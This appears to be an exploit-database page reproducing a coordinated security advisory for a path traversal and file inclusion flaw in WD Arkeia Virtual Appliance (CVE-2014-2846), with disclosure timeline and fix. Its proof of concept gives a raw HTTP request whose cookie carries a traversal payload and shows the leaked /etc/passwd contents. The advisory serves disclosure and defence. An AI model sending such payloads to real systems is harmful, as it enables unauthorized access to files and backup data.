0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
======================================================================= title: Path Traversal/Remote Code Execution product: WD Arkeia Virtual Appliance (AVA) vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3. fixed version: 10.2.9 CVE number: CVE-2014-2846 impact: critical homepage: http://www.arkeia.com/ found: 2014-03-05 by: M. Lucinskij SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and affordable data protection for enterprises seeking to optimize the benefits of virtualization. The AVA offers all the features of the hardware appliance, but permits you to use your own choice of hardware." source: http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance Business recommendation: ------------------------ The identified path traversal vulnerability can be exploited by unauthenticated remote attackers to gain unauthorized access to the WD Arkeia virtual appliance and stored backup data. SEC Consult recommends to restrict access to the web interface of the WD Arkeia virtual appliance using a firewall until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the affected vendor. Vulnerability overview/description: ----------------------------------- The WD Arkeia virtual appliance is affected by a path traversal vulnerability. Path traversal enables attackers access to files and directories outside the web root through relative file paths in the user input. An unauthenticated remote attacker can exploit the identified vulnerability in order to retrieve arbitrary files from the affected system and execute system commands. Proof of concept: ----------------- The path traversal vulnerability exists in the /opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie is not properly checked before including a file using the PHP include() function. Example of the request that demonstrates the vulnerability by retrieving the contents of the /etc/passwd file: POST /login/doLogin HTTP/1.0 Host: $host Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00 Content-Length: 25 Content-Type: application/x-www-form-urlencoded password=bbb&username=aaa The response from the affected application: HTTP/1.1 200 OK Date: Wed, 05 Mar 2014 08:29:35 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Charset: UTF-8 Content-Length: 1217 Connection: close Content-Type: text/html; charset=UTF-8 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin dhcpd:x:177:177:DHCP server:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin {"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n ull]}} Furthermore, the identified vulnerability can be also exploited to execute arbitrary PHP code/system commands by including files that contain specially crafted user input. Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in the 10.2.7 version of the WD Arkeia virtual appliance. According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3 are affected. Vendor contact timeline: ------------------------ 2014-03-13: Contacting vendor through support@arkeia.com 2014-03-14: Vendor confirms the vulnerability. 2014-03-17: Vendor provides a quick fix and a release schedule. 2014-04-21: Vendor releases a fixed version 2014-04-23: SEC Consult releases a coordinated security advisory. Solution: --------- Update to the most recent version (10.2.9) of Arkeia Network Backup. More information can be found at: http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution # 0day.today [2024-11-16] #